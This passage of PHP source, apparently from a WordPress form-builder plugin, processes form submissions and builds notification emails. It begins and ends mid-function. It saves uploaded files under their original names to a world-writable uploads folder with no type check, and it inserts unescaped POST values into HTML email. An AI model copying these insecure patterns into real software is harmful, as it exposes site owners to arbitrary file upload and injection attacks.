                $destination = 'wp-content/uploads/tmpAddon';
                if(!file_exists($destination))
                    mkdir($destination , 0777);
            
                foreach($all_files as &$all_file){
                    $fileTemp = $all_file['tmp_name'];
                    $fileName = $all_file['name'];
                    if(!move_uploaded_file($fileTemp, ABSPATH . $destination . '/' . $fileName)) {	
                        echo "<script> alert('" . addslashes(__('Error, file cannot be moved.', 'form_maker')) . "');</script>";
                        return array($max+1);
                    }
                    
                    $all_file['tmp_name'] = $destination . "/" . $fileName;
                }
            }
		$ip = $_SERVER['REMOTE_ADDR'];
		$replyto = '';
		global $wpdb;
		$row = $wpdb->get_row($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE id=%d", $id));
		if (!$row->form_front) {
			$id = '';
		}

		$custom_fields = array('ip', 'useremail', 'username', 'subid', 'all' );
		$subid = $wpdb->get_var("SELECT MAX( group_id ) FROM " . $wpdb->prefix ."formmaker_submits" );
		
		$current_user =  wp_get_current_user();
		if ($current_user->ID != 0)
		{
			$username =  $current_user->display_name;
			$useremail =  $current_user->user_email;
		}
		else
		{
			$username = '';
			$useremail = '';
		}
		
		$label_order_original = array();
		$label_order_ids = array();
		$label_label = array();
		$label_type = array();
		$total = 0;
		$form_currency = '$';
		$currency_code = array('USD', 'EUR', 'GBP', 'JPY', 'CAD', 'MXN', 'HKD', 'HUF', 'NOK', 'NZD', 'SGD', 'SEK', 'PLN', 'AUD', 'DKK', 'CHF', 'CZK', 'ILS', 'BRL', 'TWD', 'MYR', 'PHP', 'THB');
		$currency_sign = array('$', '&#8364;', '&#163;', '&#165;', 'C$', 'Mex$', 'HK$', 'Ft', 'kr', 'NZ$', 'S$', 'kr', 'zl', 'A$', 'kr', 'CHF', 'Kc', '&#8362;', 'R$', 'NT$', 'RM', '&#8369;', '&#xe3f;');
		if ($row->payment_currency) {
		  $form_currency = $currency_sign[array_search($row->payment_currency, $currency_code)];
		}

		$old = false;		
		if(isset($row->form)) {
			$old = true;
		}

		$cc = array();
		$row_mail_one_time = 1;
		$label_type = array();
			
		if($old == false || ($old == true && $row->form == '')) {
			$label_all	= explode('#****#',$row->label_order_current);
		}
		else {
			$label_all	= explode('#****#',$row->label_order);    
		}
		$label_all = array_slice($label_all, 0, count($label_all) - 1);
		foreach ($label_all as $key => $label_each) {
			$label_id_each = explode('#**id**#', $label_each);
			$label_id = $label_id_each[0];
			array_push($label_order_ids, $label_id);
			$label_order_each = explode('#**label**#', $label_id_each[1]);
			$label_order_original[$label_id] = $label_order_each[0];
			$label_type[$label_id] = $label_order_each[1];
			array_push($label_label, $label_order_each[0]);
			array_push($label_type, $label_order_each[1]);
		}

		$disabled_fields = explode(',', isset($_REQUEST["disabled_fields".$id]) ? $_REQUEST["disabled_fields".$id] : "");
		$disabled_fields = array_slice($disabled_fields,0, count($disabled_fields)-1);   
		
		$list='<table border="1" cellpadding="3" cellspacing="0" style="width:600px;">';
		$list_text_mode = '';
		if($old == false || ($old == true && $row->form == '')) {
			foreach($label_order_ids as $key => $label_order_id) {
				$i = $label_order_id;
				$type = $label_type[$i];

				if($type != "type_map" and  $type != "type_submit_reset" and  $type != "type_editor" and  $type != "type_captcha" and $type != "type_arithmetic_captcha" and  $type != "type_recaptcha" and  $type != "type_button") {	
					$element_label=$label_order_original[$i];
					if(!in_array($i,$disabled_fields)) {
						switch ($type) {
							case 'type_text':
							case 'type_password':
							case 'type_textarea':
							case "type_date":
							case "type_own_select":					
							case "type_country":				
							case "type_number": {
								$element = isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td>' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}	
							
								break;
							}
							case "type_hidden": {
								$element = isset($_POST[$element_label]) ? $_POST[$element_label] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td>' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}
								break;
							}
							case "type_mark_map": {
								$element = isset($_POST['wdform_'.$i."_long".$id]) ? $_POST['wdform_'.$i."_long".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td>Longitude:' . $element . '<br/>Latitude:' . (isset($_POST['wdform_'.$i."_lat".$id]) ? $_POST['wdform_'.$i."_lat".$id] : "") . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - Longitude:'.$element.' Latitude:'.(isset($_POST['wdform_'.$i."_lat".$id]) ? $_POST['wdform_'.$i."_lat".$id] : "")."\r\n";
								}
								break;		
							}
							case "type_submitter_mail": {
								$element = isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}
								break;		
							}						
							
							case "type_time": {							
								$hh = isset($_POST['wdform_'.$i."_hh".$id]) ? $_POST['wdform_'.$i."_hh".$id] : NULL;
								if(isset($hh) && ($this->empty_field($hh, $row->mail_emptyfields) || $this->empty_field($_POST['wdform_'.$i."_mm".$id], $row->mail_emptyfields) || $this->empty_field($_POST['wdform_'.$i."_ss".$id], $row->mail_emptyfields))) {
									$ss = isset($_POST['wdform_'.$i."_ss".$id]) ? $_POST['wdform_'.$i."_ss".$id] : NULL;
									if(isset($ss)) {
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $hh . ':' . (isset($_POST['wdform_'.$i."_mm".$id]) ? $_POST['wdform_'.$i."_mm".$id] : "") . ':' . $ss;
										$list_text_mode=$list_text_mode.$element_label.' - '.$hh.':'.(isset($_POST['wdform_'.$i."_mm".$id]) ? $_POST['wdform_'.$i."_mm".$id] : "").':'.$ss;
									}
									else {
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $hh . ':' . (isset($_POST['wdform_'.$i."_mm".$id]) ? $_POST['wdform_'.$i."_mm".$id] : "");
										$list_text_mode=$list_text_mode.$element_label.' - '.$hh.':'.(isset($_POST['wdform_'.$i."_mm".$id]) ? $_POST['wdform_'.$i."_mm".$id] : "");
									}
									$am_pm = isset($_POST['wdform_'.$i."_am_pm".$id]) ? $_POST['wdform_'.$i."_am_pm".$id] : NULL;
									if(isset($am_pm)) {
										$list = $list . ' ' . $am_pm . '</td></tr>';
										$list_text_mode=$list_text_mode.$am_pm."\r\n";
									}
									else {
										$list = $list.'</td></tr>';
										$list_text_mode=$list_text_mode."\r\n";
									}
								}								
								break;
							}
						  
							case "type_phone": {
								$element_first = isset($_POST['wdform_'.$i."_element_first".$id]) ? $_POST['wdform_'.$i."_element_first".$id] : NULL;
								if(isset($element_first) && $this->empty_field($element_first, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element_first . ' ' . (isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : "") . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element_first.' '.(isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : "")."\r\n";
								}	
								break;
							}
						  
							case "type_name": {
								$element_first = isset($_POST['wdform_'.$i."_element_first".$id]) ? $_POST['wdform_'.$i."_element_first".$id] : NULL;
								if(isset($element_first)) {
									$element_title = isset($_POST['wdform_'.$i."_element_title".$id]) ? $_POST['wdform_'.$i."_element_title".$id] : NULL;
									$element_middle = isset($_POST['wdform_'.$i."_element_middle".$id]) ? esc_html($_POST['wdform_'.$i."_element_middle".$id]) : NULL;
									if((isset($element_title) || isset($element_middle))  && ($this->empty_field($element_title, $row->mail_emptyfields) || $this->empty_field($element_first, $row->mail_emptyfields) || $this->empty_field($_POST['wdform_'.$i."_element_last".$id], $row->mail_emptyfields) || $this->empty_field($_POST['wdform_'.$i."_element_middle".$id], $row->mail_emptyfields))) {
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . (isset($_POST['wdform_'.$i."_element_title".$id]) ? $_POST['wdform_'.$i."_element_title".$id] : '') . ' ' . $element_first . ' ' . (isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : "") . ' ' . (isset($_POST['wdform_'.$i."_element_middle".$id]) ? $_POST['wdform_'.$i."_element_middle".$id] : "") . '</td></tr>';
										$list_text_mode=$list_text_mode.$element_label.' - '.(isset($_POST['wdform_'.$i."_element_title".$id]) ? $_POST['wdform_'.$i."_element_title".$id] : '').' '.$element_first.' '.(isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : "").' '.(isset($_POST['wdform_'.$i."_element_middle".$id]) ? $_POST['wdform_'.$i."_element_middle".$id] : "")."\r\n";
									}
									else {
										if($this->empty_field($element_first, $row->mail_emptyfields) || $this->empty_field($_POST['wdform_'.$i."_element_last".$id], $row->mail_emptyfields)) {
											$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element_first . ' ' . (isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : "") . '</td></tr>';
											$list_text_mode=$list_text_mode.$element_label.' - '.$element_first.' '.(isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : "")."\r\n";
										}
									}
								}	   
								break;		
							}
						  
							case "type_address": {
								$element = isset($_POST['wdform_'.$i."_street1".$id]) ? $_POST['wdform_'.$i."_street1".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$label_order_original[$i].' - '.$element."\r\n";
									break;
								}
								$element = isset($_POST['wdform_'.$i."_street2".$id]) ? $_POST['wdform_'.$i."_street2".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$label_order_original[$i].' - '.$element."\r\n";
									break;
								}
								$element = isset($_POST['wdform_'.$i."_city".$id]) ? $_POST['wdform_'.$i."_city".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$label_order_original[$i].' - '.$element."\r\n";
									break;
								}
								$element = isset($_POST['wdform_'.$i."_state".$id]) ? $_POST['wdform_'.$i."_state".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$label_order_original[$i].' - '.$element."\r\n";
									break;
								}
								$element = isset($_POST['wdform_'.$i."_postal".$id]) ? $_POST['wdform_'.$i."_postal".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$label_order_original[$i].' - '.$element."\r\n";
									break;
								}
								$element = isset($_POST['wdform_'.$i."_country".$id]) ? $_POST['wdform_'.$i."_country".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$label_order_original[$i].' - '.$element."\r\n";
									break;
								}
								break;							
							}
							
							case "type_date_fields": {
								$day = isset($_POST['wdform_'.$i."_day".$id]) ? $_POST['wdform_'.$i."_day".$id] : NULL;
								$month = isset($_POST['wdform_'.$i."_month".$id]) ? $_POST['wdform_'.$i."_month".$id] : "";
								$year = isset($_POST['wdform_'.$i."_year".$id]) ? $_POST['wdform_'.$i."_year".$id] : "";
								if(isset($day) && $this->empty_field($day, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' .(($day || $month || $year) ? $day . '-' . $month . '-' . $year : '' ). '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.(($day || $month || $year) ? $day.'-'.$month.'-'.$year : '')."\r\n";
								}
								break;
							}
							
							case "type_radio": {
								$element = isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
									break;
								}								
								$element = isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}
								break;	
							}	
							
							case "type_checkbox": {
								$start = -1;
								for($j = 0; $j < 100; $j++) {
									$element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
									if(isset($element)) {
										$start = $j;
										break;
									}
								}								
								$other_element_id = -1;
								$is_other = isset($_POST['wdform_'.$i."_allow_other".$id]) ? $_POST['wdform_'.$i."_allow_other".$id] : "";
								if($is_other == "yes") {
									$other_element_id = isset($_POST['wdform_'.$i."_allow_other_num".$id]) ? $_POST['wdform_'.$i."_allow_other_num".$id] : "";
								}
				
								if($start != -1 || ($start == -1 && $row->mail_emptyfields))
								{
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >';
									$list_text_mode=$list_text_mode.$element_label.' - '; 
								}
								
								if($start != -1) {
									for($j = $start; $j < 100; $j++) {									
										$element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
										if(isset($element)) {
											if($j == $other_element_id) {
												$list = $list . (isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : "") . '<br>';
												$list_text_mode=$list_text_mode.(isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : "").', ';	
											}
											else {									
												$list = $list . (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : "") . '<br>';
												$list_text_mode=$list_text_mode.(isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : "").', ';
											}
										}
									}
								}
								
								if($start != -1 || ($start == -1 && $row->mail_emptyfields))
								{
									$list = $list . '</td></tr>';
									$list_text_mode=$list_text_mode."\r\n";
								}	
								break;
							}
							
							case "type_paypal_price":	{
								$value = 0;
								if(isset($_POST['wdform_'.$i."_element_dollars".$id])) {
									$value = $_POST['wdform_'.$i."_element_dollars".$id];
								}
								if(isset($_POST['wdform_'.$i."_element_cents".$id]) && $_POST['wdform_'.$i."_element_cents".$id]) {
									$value = $value . '.' . $_POST['wdform_'.$i."_element_cents".$id];
								}
							
								if($this->empty_field($value, $row->mail_emptyfields) && $value!='.')
								{
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $value . $form_currency . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$value.$form_currency."\r\n";
								}	
								break;
							}			
					  
							case "type_paypal_select": {
								if(isset($_POST['wdform_'.$i."_element_label".$id]) && $_POST['wdform_'.$i."_element".$id] != '') {
									$value = $_POST['wdform_'.$i."_element_label".$id] . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "") . $form_currency;
								}
								else {
									$value='';
								}
								$element_quantity_label = (isset($_POST['wdform_'.$i."_element_quantity_label".$id]) && $_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : NULL;
								$element_quantity = (isset($_POST['wdform_'.$i."_element_quantity".$id]) && $_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL;
								if($value != '' && isset($element_quantity)) {
									$value .= '<br/>' . $element_quantity_label . ': ' . $element_quantity;
								}
								for($k = 0; $k < 50; $k++) {
									$temp_val = isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL;
									if(isset($temp_val)) {			
										$value .= '<br/>' . (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
									}
								}

								if($this->empty_field($value, $row->mail_emptyfields))
								{
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $value . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.str_replace('<br/>',', ',$value)."\r\n";
								}	
								break;
							}
					  
							case "type_paypal_radio": {
								if(isset($_POST['wdform_'.$i."_element".$id])) {
									$value = $_POST['wdform_'.$i."_element_label".$id] . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "") . $form_currency;
							  
									$element_quantity_label = isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : NULL;
									$element_quantity = (isset($_POST['wdform_'.$i."_element_quantity".$id]) && $_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL;
									if (isset($element_quantity)) {
										$value .= '<br/>' . $element_quantity_label . ': ' . $element_quantity;
									}
									for($k = 0; $k < 50; $k++) {
										$temp_val = isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL;
										if(isset($temp_val)) {
											$value .= '<br/>' . (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
										}
									}
								}
								else {
									$value='';
								}

								if($this->empty_field($value, $row->mail_emptyfields))		
								{
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $value . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.str_replace('<br/>',', ',$value)."\r\n";
								}
								break;	
							}

							case "type_paypal_shipping": {						
								if(isset($_POST['wdform_'.$i."_element".$id])) {
									$value = $_POST['wdform_'.$i."_element_label".$id] . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "") . $form_currency;
									
									if($this->empty_field($value, $row->mail_emptyfields))		
									{
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $value . '</td></tr>';
										$list_text_mode=$list_text_mode.$element_label.' - '.$value."\r\n";
									}	
								}
								else {
									$value='';
								}	
								
								break;
							}

							case "type_paypal_checkbox": {
								              
								$start = -1;
								for($j = 0; $j < 100; $j++) {
									$element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
									if(isset($element)) {
										$start=$j;
										break;
									}
								}	
							
								if($start != -1 || ($start == -1 && $row->mail_emptyfields))
								{
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >';		
									$list_text_mode=$list_text_mode.$element_label.' - ';  
								}
								if($start!=-1) {
									for($j = $start; $j < 100; $j++) {									
										$element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
										if(isset($element)) {
											$list = $list . (isset($_POST['wdform_'.$i."_element".$id.$j."_label"]) ? $_POST['wdform_'.$i."_element".$id.$j."_label"] : "") . ' - ' . ($element == '' ? '0' . $form_currency : $element) . $form_currency . '<br>';
											$list_text_mode=$list_text_mode.(isset($_POST['wdform_'.$i."_element".$id.$j."_label"]) ? $_POST['wdform_'.$i."_element".$id.$j."_label"] : "").' - '.($element == '' ? '0' . $form_currency : $element).$form_currency.', ';
										}
									}
								}
								$element_quantity_label = isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : NULL;
								$element_quantity = (isset($_POST['wdform_'.$i."_element_quantity".$id]) && $_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL;
								if (isset($element_quantity)) {
									$list = $list . '<br/>' . $element_quantity_label . ': ' . $element_quantity;
									$list_text_mode=$list_text_mode.$element_quantity_label . ': ' . $element_quantity.', ';		
								}
								for($k = 0; $k < 50; $k++) {
									$temp_val = isset($_POST['wdform_'.$i."_element_property_value".$id.$k]) ? $_POST['wdform_'.$i."_element_property_value".$id.$k] : NULL;
									if(isset($temp_val)) {			
										$list = $list . '<br/>' . (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
										$list_text_mode=$list_text_mode.(isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "") . ': ' . $temp_val.', ';	
									}
								}
								if($start != -1 || ($start == -1 && $row->mail_emptyfields))
								{
									$list = $list . '</td></tr>';
									$list_text_mode=$list_text_mode."\r\n";	
								}
								break;
							}
						  
							case "type_paypal_total": {
								$element = isset($_POST['wdform_'.$i."_paypal_total".$id]) ? $_POST['wdform_'.$i."_paypal_total".$id] : "";
								if($this->empty_field($element, $row->mail_emptyfields))		
								{
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}	
								break;
							}
						
							case "type_star_rating": {
								$element = isset($_POST['wdform_'.$i."_star_amount".$id]) ? $_POST['wdform_'.$i."_star_amount".$id] : NULL;
								$selected = isset($_POST['wdform_'.$i."_selected_star_amount".$id]) ? $_POST['wdform_'.$i."_selected_star_amount".$id] : 0;
								if(isset($element) && $this->empty_field($selected, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $selected . '/' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$selected.'/'.$element."\r\n";
								}
								break;
							}
						  
							case "type_scale_rating": {
								$element = isset($_POST['wdform_'.$i."_scale_amount".$id]) ? $_POST['wdform_'.$i."_scale_amount".$id] : NULL;
								$selected = isset($_POST['wdform_'.$i."_scale_radio".$id]) ? $_POST['wdform_'.$i."_scale_radio".$id] : 0;
								if(isset($element) && $this->empty_field($selected, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $selected . '/' . $element . '</td></tr>';	
									$list_text_mode=$list_text_mode.$element_label.' - '.$selected.'/'.$element."\r\n";
								}
								break;
							}
						  
							case "type_spinner": {
								$element = isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}
								break;
							}
						  
							case "type_slider": {
								$element = isset($_POST['wdform_'.$i."_slider_value".$id]) ? $_POST['wdform_'.$i."_slider_value".$id] : NULL;
								if(isset($element) && $this->empty_field($element, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}
								break;
							}
						  
							case "type_range": {
								$element0 = isset($_POST['wdform_'.$i."_element".$id.'0']) ? $_POST['wdform_'.$i."_element".$id.'0'] : NULL;
								$element1 = isset($_POST['wdform_'.$i."_element".$id.'1']) ? $_POST['wdform_'.$i."_element".$id.'1'] : NULL;
								if((isset($element0) && $this->empty_field($element0, $row->mail_emptyfields)) || (isset($element1) && $this->empty_field($element1, $row->mail_emptyfields))) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >From:' . $element0 . '<span style="margin-left:6px">To</span>:' . $element1 . '</td></tr>';					
									$list_text_mode=$list_text_mode.$element_label.' - From:'.$element0.' To:'.$element1."\r\n";
								}
								break;
							}
						  
							case "type_grading": {
								$element = isset($_POST['wdform_'.$i."_hidden_item".$id]) ? $_POST['wdform_'.$i."_hidden_item".$id] : "";
								$grading = explode(":", $element);
								$items_count = sizeof($grading) - 1;							
								$element = "";
								$total = "";	
								$form_empty_field = 1;
								for($k = 0;$k < $items_count; $k++) {
									$element .= $grading[$k] . ":" . (isset($_POST['wdform_'.$i."_element".$id.'_'.$k]) ? $_POST['wdform_'.$i."_element".$id.'_'.$k] : "") . " ";
									$total += (isset($_POST['wdform_'.$i."_element".$id.'_'.$k]) ? $_POST['wdform_'.$i."_element".$id.'_'.$k] : 0);
									if(isset($_POST['wdform_'.$i."_element".$id.'_'.$k]))
										$form_empty_field = 0;
								}
								$element .= "Total:" . $total;
								if(isset($element) && $this->empty_field($form_empty_field, $row->mail_emptyfields)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $element . '</td></tr>';
									$list_text_mode=$list_text_mode.$element_label.' - '.$element."\r\n";
								}
								break;
							}
						
							case "type_matrix": {
								$input_type = isset($_POST['wdform_'.$i."_input_type".$id]) ? $_POST['wdform_'.$i."_input_type".$id] : "";
								$mat_rows = explode("***", isset($_POST['wdform_'.$i."_hidden_row".$id]) ? $_POST['wdform_'.$i."_hidden_row".$id] : "");
								$rows_count = sizeof($mat_rows) - 1;
								$mat_columns = explode("***", isset($_POST['wdform_'.$i."_hidden_column".$id]) ? $_POST['wdform_'.$i."_hidden_column".$id] : "");
								$columns_count = sizeof($mat_columns) - 1;
								$matrix = "<table>";
								$matrix .= '<tr><td></td>';							
								for($k = 1; $k < count($mat_columns); $k++) {
									$matrix .= '<td style="background-color:#BBBBBB; padding:5px; ">' . $mat_columns[$k] . '</td>';
								}
								$matrix .= '</tr>';							
								$aaa = Array();							
								for($k = 1; $k <= $rows_count; $k++) {
									$matrix .= '<tr><td style="background-color:#BBBBBB; padding:5px;">' . $mat_rows[$k] . '</td>';
									if($input_type == "radio") {
										$mat_radio = isset($_POST['wdform_'.$i."_input_element".$id.$k]) ? $_POST['wdform_'.$i."_input_element".$id.$k] : 0;
										if($mat_radio == 0) {
											$checked = "";
											$aaa[1] = "";
										}
										else {
											$aaa = explode("_", $mat_radio);
										}
										for($j = 1; $j <= $columns_count; $j++) {
											if($aaa[1] == $j) {
												$checked = "checked";
											}
											else {
												$checked = "";
											}
											$matrix .= '<td style="text-align:center"><input  type="radio" ' . $checked . ' disabled /></td>';
										}
									}
									else {
										if($input_type == "checkbox") {                
											for($j = 1; $j <= $columns_count; $j++) {
												$checked = isset($_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j] : "";
												if($checked == 1) {
													$checked = "checked";
												}
												else {
													$checked = "";
												}
												$matrix .= '<td style="text-align:center"><input  type="checkbox" ' . $checked . ' disabled /></td>';									
											}								
										}
										else {
											if($input_type == "text") {																  
												for($j = 1; $j <= $columns_count; $j++) {
													$checked = isset($_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j] : "";
													$matrix .= '<td style="text-align:center"><input  type="text" value="' . $checked . '" disabled /></td>';								
												}										
											}
											else {
												for($j = 1; $j <= $columns_count; $j++) {
													$checked = isset($_POST['wdform_'.$i."_select_yes_no".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_select_yes_no".$id.$k.'_'.$j] : "";
													$matrix .= '<td style="text-align:center">' . $checked . '</td>';
												}
											}									
										}									
									}
									$matrix .= '</tr>';							
								}
								$matrix .= '</table>';	
								if(isset($matrix)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $matrix . '</td></tr>';
								}						
								break;
							}
							default: break;
						}
					}
				}				
			}

			$list = $list . '</table>';
			if($row->sendemail) {
				$fromname = $row->mail_from_name_user;        
				if($row->mail_subject_user)	
					$subject 	= $row->mail_subject_user;
				else
					$subject 	= $row->title;
				if($row->reply_to_user) {
					$replyto = $row->reply_to_user;
				}
				$attachment_user = array(); 	
				if ($row->mail_attachment_user) {
					for ($k = 0; $k < count($all_files); $k++) {
						if (isset($all_files[$k]['tmp_name'])) {
							$attachment_user[$k] = $all_files[$k]['tmp_name'];
						}
					}
				}
					
				if ($row->mail_mode_user) {
					$content_type = "text/html";
					$mode = 1;
					$list_user = wordwrap($list, 70, "\n", true);
					$new_script = wpautop($row->script_mail_user);
				}	
				else {
					$content_type = "text/plain";
					$mode = 0; 
					$list_user = wordwrap($list_text_mode, 1000, "\n", true);
					$new_script = str_replace(array('<p>','</p>'),'',$row->script_mail_user);
				}
				
				foreach($label_order_original as $key => $label_each) {
					$type=$label_type[$key];
					if(strpos($row->script_mail_user, "%".$label_each."%")>-1)	 {
						$new_value = $this->custom_fields_mail($type, $key, $id, $attachment_user, '');				
						$new_script = str_replace("%".$label_each."%", $new_value, $new_script);
					}
					
					if(strpos($fromname, "%".$label_each."%")>-1) {	
